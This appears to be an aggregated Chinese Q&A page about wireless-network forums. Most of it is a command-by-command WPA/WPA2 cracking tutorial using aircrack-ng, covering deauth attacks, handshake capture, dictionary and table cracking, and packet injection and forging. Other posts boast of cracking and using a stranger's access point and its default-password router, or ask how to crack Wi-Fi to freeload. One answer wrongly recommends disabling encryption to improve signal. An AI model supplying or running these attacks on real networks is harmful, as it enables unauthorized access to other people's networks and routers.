導航:首頁 > 無線網路 > 中國無線網路論壇

中國無線網路論壇

發布時間:2022-09-26 06:49:18

❶ 求無線技術論壇

http://www.mywlans.com

「當你對無線網路的認識還停留在手機上網、筆記本上網的時候,你已經落伍了」——版主cq779

無線網路已經越來越平民化,越來越大眾化,人們對無線網路的需求已經從會用上升到會玩的境界。記者近期發現了一處無線發燒級網友們的樂園「無線之家」論壇。

「誰說高科技原理深奧難懂,高科技本來就應該充滿情趣」網友東皇太一如是說,長久以來東皇太一一直在「玩」無線,從小時候的對講機,到後來的遙控汽車,再到今天自己已經將自己的新家全面改造為無線住宅,一路走來沒人與自己分享這份成就感是他最苦惱的。一次偶然的發現,讓他找到了屬於自己的天堂,升級為2.0版本的「無線之家」論壇為無線「潮」人們提供了一個秀出最新的裝備的平台,在哪才能交流無線改造的心得?現在這個問題已經不在困擾東皇太一了。

「WiFi是王道,讓3G滾蛋?」這是網友wifi24的心聲,曾經被眾多3G死忠們在其他論壇里死K的wifi24,現在在「無線之家」找到了一群志同道合的朋友,他們相信無線城市的實現是要靠WiFi的,並且不斷的規劃著他們的無線城市。

記者了解到當無線網路已經深入百姓居家生活,滲透到學習、娛樂、出行等各個細節的時候,無線出你的個性已經成為了一種新的休閑方式,「不要被高科技三個字給嚇倒,科技註定要被請下神壇,成為我們手中的玩物,讓平凡生活顯出精彩」——成了這群無線發燒友們對這個世界的宣言。

❷ 中國業余無線電論壇,為什麼怎麼辦呢登陸不上去,一點網頁,就出現域名訪問提示錯誤

.net 可以, .com不行, 估計網站維護吧

❸ 用薄銅片自製手機WiFi高效天線,求無線電高手給我方法(圖片),,,,緊急求助-!!!

1,你需要准備一個大的回形針,一根用過的老式圓珠筆,以及一卷電工膠布。你還可能需要直尺、剪刀和打火機。

2,將回形針拉直,展開回形針,將其拉直為直線的形狀。

3,為了獲得最佳信號,回形針長度必須為 61 毫米。你需要盡可能讓回形針長度接近這一數值,只有這樣才能製作出最高效的天線。

4,你需要在大約 19 毫米位置將回形針彎曲,形成一個90°的直角。這部分回形針將會被插入 WiFi 天線埠中。

5,你最好使用廢棄的圓珠筆,因為你需要將筆芯剪斷。將筆芯剪下長度為 12-18 毫米的一段。由於筆芯中可能還有墨水,因此剪斷筆芯時使其遠離自己,剪斷時,你可以將筆芯放置在一個平面上,以免墨水濺到身上。

6,將剪下部分的筆芯套在回形針彎曲的那頭。確保筆芯超出回形針末端大約 1.5 毫米。

7,使用打火機或其他熱源小心加熱回形針上的筆芯。這將使得筆芯收縮,使其緊緊套在回形針上。

8,在回形針上纏繞電工膠帶,以防止無線信號的干擾。

9,將回形針的「筆芯」一頭插入天線埠,確保介面針腳與回形針在筆芯內部連接在一起。如果你能夠讓它們重疊在一起,那麼接收到的信號會更好。

❹ WPA2 網路破解

WPA破解詳細教程
破解 WPA 的前提:必須要有合法無線客戶端
WPA 破解的原理:
利用Deauth驗證攻擊。也就是說強制讓合法無線客戶端與AP被斷開,當它被從WLAN 中斷開後,這個無線
客戶端會自動嘗試重新連接到AP上,在這個重新連接過程中,數據通信就產生了,然後利用airomp捕獲
一個無線路由器與無線客戶端四次握手的過程,生成一個包含四次握手的cap包。然後再利用字典進行暴力
破解。
1. 激活網卡,並讓其工作於11信道
Airmon-ng start wifi0 11
2.捕獲11信道的cap包,並保存cap包為123.cap
Airomp-ng –w 123 –c 11 wifi0
上圖可以看出採用了WPA加密方式,並且有一個0016b69d10ad合法的無線客戶端。
3. 進行Deauth驗證攻擊,強制斷開合法無線客戶端和AP直接的連接,使其重新進行連接
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解釋:-0指的是採取Deautenticate攻擊方式,後面為發送次數。-c建議還是使用,效果會更好,這個後面跟
的是監測到的合法的已連接的客戶端MAC地址
注意上圖紅色部分,-c後面為合法無線客戶端的MAC地址
Deauth攻擊往往並不是一次攻擊就成功,為確保成功截獲需要反復進行(WPA破解不用等到數據Data達到
幾萬,因為它只要一個包含WPA4次握手驗證包就可以了)。如果成功捕獲會出現下圖紅色部分的提示
中國無線論壇中衛出品
AnywhereWLAN!! 25
這時如果輸入dir就可以在root目錄下看到名為123.cap的握手包了。
得到握手包以後就可以用字典直接破解
首先將在windows下用字典工具生成的字典(例password.txt)拷貝到root目錄下
在BT3桌面雙擊system然後出現下圖。
圖中左邊紅色就為root目錄,圖中紅色存儲介質雙擊打開以後就看到你的每個硬碟的分區了。可以進入硬
盤分區右鍵拷貝,然後進入root目錄右鍵粘貼。如下圖紅色部分
目前WPA 的破解主要還是基於暴力破解和字典破解,暴力破解和字典破解的一個共性就是「耗時、費力、
運氣」所以往往有時候你花了很多時間但還是破不了,這時候希望大家還是要接受這樣一個殘酷的現實。
中國無線論壇中衛出品
AnywhereWLAN!! 26
破解方式一:用Cap數據包直接暴力破解
從破解難度上講WEP 是很容易破解的,只要你收集足夠的Cap 數據包就肯定可以破解。WPA 的破解需要
有好的密碼字典配合才能完成,復雜的WPA密碼可能幾個月也破解不出來。
輸入:aircrack-ng -z –b <ap mac> 123*.cap
123 是前面所獲得的握手包的文件名。系統會自動在你輸入的文件名後加上-01、-02(如果數據包太多,系
統會自動分成幾個文件存儲並自動命名,可以使用ls查看),輸入123*是打開所有123相關的cap文件。
常見問題:步驟2中收集數據包已達30W,無法破解密碼。可能系統自動分成了幾個文件貯存cap包。
如輸入123-01.cap破解可能導致破解不成功,建議使用123*.cap選擇所有的cap包進行破解。
中國無線論壇中衛出品
AnywhereWLAN!! 27
破解方式二. 掛字典破解
一.直接在BT3中掛字典破解
aircrack-ng –w password.txt –b <ap mac> 123.cap
參數說明:passwrod.txt為字典名稱123.cap為步驟2中獲得的握手信息包
耗時1分31秒獲得WPA密碼,如下圖
從上圖可以看出破解用時1分31秒,速度149.91K/S
註:本教程只為了描述破解的過程。我是做了個256K的小字典,事先把密碼已經加到字典里了。
二.也可以把包含4次握手的CAP數據包拷貝到硬碟下在WIN下用WinAircrack掛字典破解。
中國無線論壇中衛出品
AnywhereWLAN!! 28
如上圖 Encryption type處選擇WPA-PSK,下面capture files處導入抓取的握手包123.cap
然後選擇WPA選項,如下圖
在上圖中Dictionary file處導入字典文件password.txt。然後點擊右下角的Aircrack the key
中國無線論壇中衛出品
AnywhereWLAN!! 29
然後出現下圖提示
上圖,選擇1後回車,然後開始破解。成功破解如下圖
從上圖可以看出破解用時54秒,速度251.73K/S(比BT3下要快)
中國無線論壇中衛出品
AnywhereWLAN!! 30
三.通過airolib構建WPA table實現WPA線速破解
WPA的字典破解除了直接掛字典破解外,另外一種就是用airolib將字典構造成WPA table然後再用aircrac
進行破解。
構建WPA table就是採用和WPA加密採用同樣演算法計算後生成的Hash 散列數值,這樣在需要破解的時候直
接調用這樣的文件進行比對,破解效率就可以大幅提高。
先講通過airolib構建WPA table
WPA table具有較強的針對ssid的特性。
1. 在構建WPA table之前需要准備兩個文件:一個是ssid列表的文件ssid.txt,一個是字典文件
password.txt。下圖為我的文件
大家可以看到兩個txt的文件,ssid記事本里是ssid的列表,你可以增加常見的ssid進去,後面的passwrod
就是字典文件了。
2. 把這ssid.txt和password.txt還有上面抓到的握手包123.cap這三個文件拷貝到root目錄下方便使用。
見下圖
3.開始利用airolib-ng來構建WPA table了。構建wpa table保存的名字為wpahash(下同)
第一步,如下圖
airolib-ng wpa --import essid ssid.txt
中國無線論壇中衛出品
AnywhereWLAN!! 31
第二步,如下圖
airolib-ng wpa --import passwd password.txt
第三步,如下圖
airolib-ng wpa --clean all
第四步,如下圖
airolib-ng wpa --batch
註:這一步要等很久(視字典大小而定,我256K的字典等了有15分鍾)
4. 用aircrack來利用WPA table進行破解
Aircrack-ng –r wpahash 123.cap
選擇1以後將開始破解。
中國無線論壇中衛出品
AnywhereWLAN!! 32
成功破解將如下圖所示
從上圖中可以看出耗時00:00:00反正不超過1秒鍾,速度42250.00K/S
大家也看到了三種破解方式,直接掛字典中在win下用WinAircrack破解是速度比在BT3下要快。直接掛字典
破解不超過1分鍾就破出了密碼;利用WPA table破解速度雖然不到一秒,但是構建WPA table卻耗費了15分
鍾。構建WPA table是很耗時的,但是構建出了包括常見ssid的和相對較大字典的WPA table的話,以後破
解的速度將大大降低。當然沒有萬能的字典,如果有萬能的字典,再構建出一個常見ssid的WPA table的話
那這個預運算資料庫是超級超級龐大的。
註:WIN平台下的CAIN軟體中的破解器也可用於WEP和WPA的基於暴力和字典的破解,但是其破解速度很慢,
相比aircrack-ng而言不具實用價值。
中國無線論壇中衛出品
AnywhereWLAN!! 33
Aireplay-ng的6種攻擊模式詳解
-0 Deautenticate 沖突模式
使已經連接的合法客戶端強制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗證數據包,
從而產生有效ARP request。
如果一個客戶端連在路由端上,但是沒有人上網以產生有效數據,此時,即使用-3 也無法產生有效ARP
request。所以此時需要用-0 攻擊模式配合,-3 攻擊才會被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
參數說明:
【-0】:沖突攻擊模式,後面跟發送次數(設置為0,則為循環攻擊,不停的斷開連接,客戶端無法正常上
網)
【-a】:設置ap的mac
【-c】:設置已連接的合法客戶端的mac。如果不設置-c,則斷開所有和ap連接的合法客戶端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
註:使用此攻擊模式的前提是必須有通過認證的合法的客戶端連接到路由器
-1 fakeauth count 偽裝客戶端連接
這種模式是偽裝一個客戶端和AP進行連接。
這步是無客戶端的破解的第一步,因為是無合法連接的客戶端,因此需要一個偽裝客戶端來和路由器相連。
為讓AP接受數據包,必須使自己的網卡和AP關聯。如果沒有關聯的話,目標AP將忽略所有從你網卡發
送的數據包,IVS 數據將不會產生。用-1 偽裝客戶端成功連接以後才能發送注入命令,讓路由器接受到注
入命令後才可反饋數據從而產生ARP包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
參數說明:
【-1】:偽裝客戶端連接模式,後面跟延時
【-e】:設置ap的essid
【-a】:設置ap的mac
【-h】:設置偽裝客戶端的網卡MAC(即自己網卡mac)
-2 Interactive 交互模式
這種攻擊模式是一個抓包和提數據發攻擊包,三種集合一起的模式
1.這種模式主要用於破解無客戶端,先用-1建立虛假客戶端連接然後直接發包攻擊
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
參數說明:
【-2】:交互攻擊模式
【-p】設置控制幀中包含的信息(16進制),默認採用0841
【-c】設置目標mac地址
【-b】設置ap的mac地址
【-h】設置偽裝客戶端的網卡MAC(即自己網卡mac)
2.提取包,發送注入數據包
aireplay-ng -2 –r <file> -x 1024 wifi0
發包攻擊.其中,-x 1024 是限定發包速度,避免網卡死機,可以選擇1024。
中國無線論壇中衛出品
AnywhereWLAN!! 34
-3 ARP-request 注入攻擊模式
這種模式是一種抓包後分析重發的過程
這種攻擊模式很有效。既可以利用合法客戶端,也可以配合-1 利用虛擬連接的偽裝客戶端。如果有合法客
戶端那一般需要等幾分鍾,讓合法客戶端和ap 之間通信,少量數據就可產生有效ARP request 才可利用-3
模式注入成功。如果沒有任何通信存在,不能得到ARP request.,則這種攻擊就會失敗。如果合法客戶端和
ap之間長時間內沒有ARP request,可以嘗試同時使用-0 攻擊。
如果沒有合法客戶端,則可以利用-1 建立虛擬連接的偽裝客戶端,連接過程中獲得驗證數據包,從而產生
有效ARP request。再通過-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
參數說明:
【-3】:arp注入攻擊模式
【-b】:設置ap的mac
【-h】:設置
【-x】:定義每秒發送數據戶包的數量,但是最高不超過1024,建議使用512(也可不定義)
-4 Chopchop 攻擊模式,用以獲得一個包含密鑰數據的xor 文件
這種模式主要是獲得一個可利用包含密鑰數據的xor 文件,不能用來解密數據包。而是用它來產生一個新
的數據包以便我們可以進行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
參數說明:
-b:設置需要破解的AP的mac
-h:設置虛擬偽裝連接的mac(即自己網卡的mac)
-5 fragment 碎片包攻擊模式用以獲得PRGA(包含密鑰的後綴為xor 的文件)
這種模式主要是獲得一個可利用PRGA,這里的PRGA 並不是wep key數據,不能用來解密數據包。而是
用它來產生一個新的數據包以便我們可以進行注入。其工作原理就是使目標AP重新廣播包,當AP重廣播
時,一個新的IVS將產生,我們就是利用這個來破解
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻擊模式
【-b】:設置ap的mac
【-h】:設置虛擬偽裝連接的mac(即自己網卡的mac)
中國無線論壇中衛出品
AnywhereWLAN!! 35
Packetforge-ng:數據包製造程序
Packetforge-ng <mode> <options>
Mode
【-0】:偽造ARP包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255
–y<.xor file> -w mrarp
參數說明:
【-0】:偽裝arp數據包
【-a】:設置ap的mac
【-h】設置虛擬偽裝連接的mac(即自己的mac)
【-k】<ip[:port]>說明:設置目標文件IP和埠
【-l】<ip[:port]>說明:設置源文件IP和埠
【-y】<file>說明:從xor 文件中讀取PRGA。後面跟xor 的文件名。
【-w】設置偽裝的arp包的文件名
Aircrack-ng:WEP 及WPA-PSK key 破解主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
參數說明:
【-n】:設置WEP KEY 長度(64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
參數說明:
【-x】:設置為暴力破解模式
【-f】:設置復雜程度,wep密碼設置為1,wpa 密碼設置為2
aircrack-ng -w password.txt ciw.cap
【-w】:設置為字典破解模式,後面跟字典文件,再後面跟是我們即時保存的那個捕獲到WPA 驗證的抓包文件。

❺ 國內知名的無線電論壇有哪些

中國CQ無線電論壇
http://www.cqcqcq.net/
中國無線電聯盟
http://bbs.cru.net.cn/cgi-bin/leobbs.cgi

簡單啊
給分數阿
你看就我一個人過來回復的

❻ 用ewsa破解的密碼是19700101如何使用啊有好幾個無線網路呢,都是wpa2或者wpa的,謝謝!

先在這里謝謝vegeta,你的新字典真不錯。
這個ap,很早以前就想學習,因為他是我這里好有的幾個好信號,今天學習成功wpa。非常之開心。
其實這個密碼,是個生日密碼。但是是1968年的生日,我的天呀!!,我的字典都是從1970年開始做的,看來這個ap的主人年齡不小了,呵呵42歲了。我們下次做字典的時候,是不是還應該把年齡放寬一點呢。!!
我現在使用的就是這個ap。信號還不錯,哈哈

這個ap,不知道為什麼剛開始,不能分配ip,我用了好幾個工具,才找到合法的ip,
但後來進了路由後,(路由是初始密碼的,呵)看到裡面的mac沒有過濾,dhcp也沒有關閉。
關於這個問題,我下次再上帖子,詳細說明一下。(圖已經截好了)

下面再來討論一下,有些握手包,加入到ewsa裡面的時候,提示錯誤,那麼這樣的包,還能學習嗎????
答案是肯定的,今天特意做了實驗。只要是正確的方法得到的包,是絕對可以找到密碼
所用的包,就是這個ap的,很早以前就已經抓到包了。但是沒有時間去跑包,所以就一直放著。

下圖中可以看到「你選擇的不包含任何關於密碼的有效性的信息,你這個十有八九不行」的提示!!!!!
我把字典里加入那個密碼,
利用ewsa,成功找到密碼,我把包和自己做的一個小字典放上來。大家可以試一下。

看上圖,恭喜!密碼已經找到了。呵!!!轉載請註明出自中國無線論壇 ,本貼地址:

❼ 如何降低無線網路信號的強度

1、由於無線信號在穿越障礙物後,尤其是在穿越金屬後,信號會大幅衰減。
你可以把信號源放在鐵盒子里,混凝土盒裡,etc。
2、我們在無線信號配置界面里,會看到無線信道的選項。
選擇和你周圍一樣的無線信道,找干擾,信號減弱大大滴。
3、天線是無線信號發射的必須。
把天線拆了信號肯定若,把天線網狀的捋直了信號也能減弱。
望採納。

❽ 辦公室如何提高無線網路信號強度

軟硬兼施提高無線信號強度
方法一:修改信號發射頻段

一般來說無線路由器默認的無線信號發射所使用的頻段很容易和其他同類產品產生沖突,所以在信號不好的情況下我們可以嘗試修改信號發射頻段,筆者的經驗是最後一個或者第一個頻段是最好的,很難有沖突發生,而頻段6干擾最厲害,因為很多產品默認發身頻段都是6。

方法二:取消加密以及DHCP自動分配地址

雖然很多文章都說了加密或者採用DHCP自動分配網路參數是不影響無線傳輸速度的,但是筆者發現在實際使用過程中如果覺得無線信號不好或者覆蓋范圍不夠廣的話,依然可以嘗試降低加密級別或者取消加密驗證,並且關閉DHCP自動分配地址的功能而採取手工設置IP等信息,往往可以有效的提高無線信號接受強度,解決無線信號弱的問題。

方法三:合理擺放設備位置

很多用戶在無線設備擺放上不太講究,經常把無線設備放到書房或陽台這種比較偏的位置,實際上無線設備發射出的信號是以圓圈形式發散的,所以其傳輸最大距離是其半徑,因此我們應該盡量將無線設備放到家中的中間位置,這樣可以最大限度的提高無線信號對家中各個房間的覆蓋率和強度,解決信號弱的問題。

方法四:安裝官方網卡驅動程序:

一般來說如果自己計算機無線網卡驅動使用的是萬能網卡驅動程序或者第三方驅動甚至是系統自帶的驅動程序的話,在無線信號接收上不能夠百分之百的發揮性能,所以我們應該盡量安裝官方提供的網卡驅動程序,最好的最新版本的,我們可以通過訪問無線網卡廠商的官方網站來下載發布時間最新的網卡驅動程序,從而發揮無線網卡的最佳性能,解決信號弱的問題。

二、硬體入手提高無線信號強度:

當然從軟體上解決無線信號強度雖然有效果,但是只不過是治標不治本的手段,要想徹底解決信號弱和覆蓋面積小的問題就必須從硬體入手。

方法一:通過WDS擴展無線信號

前面幾篇文章筆者曾經介紹過如何通過WDS這種無線中繼技術擴展無線信號,那麼實際上我們就可以通過購買另一個AP或無線接入設備並配置WDS來擴展無線信號,從而根本上解決信號弱的問題。

方法二:利用無線信號增強套裝提高信號強度

實際上有一些廠商也為我們提供了專門的無線信號增強套裝,例如Linksys無線信號增強套裝,通過他可以有效的提高Linksys無線路由器的無線傳輸效果,讓無線信號覆蓋范圍與強度成倍提高。

方法三:改裝天線讓信號成倍提升

將無線網卡以及無線路由器的天線進行改裝,改成增益效果更好數值更大的天線也可以讓信號成本提升,不過這需要雙方面的投入。在天線改裝過程中應該選擇適合自己的,能夠使用定向天線就不要用全向天線,畢竟定向天線更具備性價比。

❾ .中國最大最專業的無線網路社區門戶!無線論壇!Anywhere WLAN!那為朋友發個邀請碼好嗎 lzh1102004@163com

已發,查收,

如未收到請檢查郵件垃圾箱!

❿ 求各位大蝦指點一下WIN7怎麼破解無線網路,蹭網的,無線網太貴了,小市民傷不起啊~ [email protected],拜謝

破解無線和系統沒有關系好吧,下個BT3或者BT5,再在網上搜索一下教程就會用了,很簡單

閱讀全文

與中國無線網路論壇相關的資料

熱點內容
騰訊即玩網路異常是怎麼回事 瀏覽:868
網路數據傳輸有哪些協議 瀏覽:910
網路設置連接不到internet 瀏覽:367
網路安全檢查自查報告 瀏覽:608
斐訊路由器未與網路時間同步 瀏覽:800
網路營銷經典案例分析ppt 瀏覽:227
包商銀行網路異常是什麼原因 瀏覽:387
長城寬頻是什麼網路 瀏覽:612
網路測試項目有哪些 瀏覽:585
索尼手機掛起網路 瀏覽:415
網路無線連接什麼意思 瀏覽:422
游族網路股份質押給了哪個公司 瀏覽:657
全國人大網路學院登錄密碼 瀏覽:439
電腦沒有網線如何無線連接網路 瀏覽:590
網路查找哪個部門投訴 瀏覽:662
applewatch經常連接不到網路 瀏覽:513
計算機網路拓撲類型分類區別 瀏覽:779
百兆電信網路多少錢 瀏覽:78
整層wifi沒有網路咋弄 瀏覽:700
內丘網路安全專項檢查 瀏覽:547

友情鏈接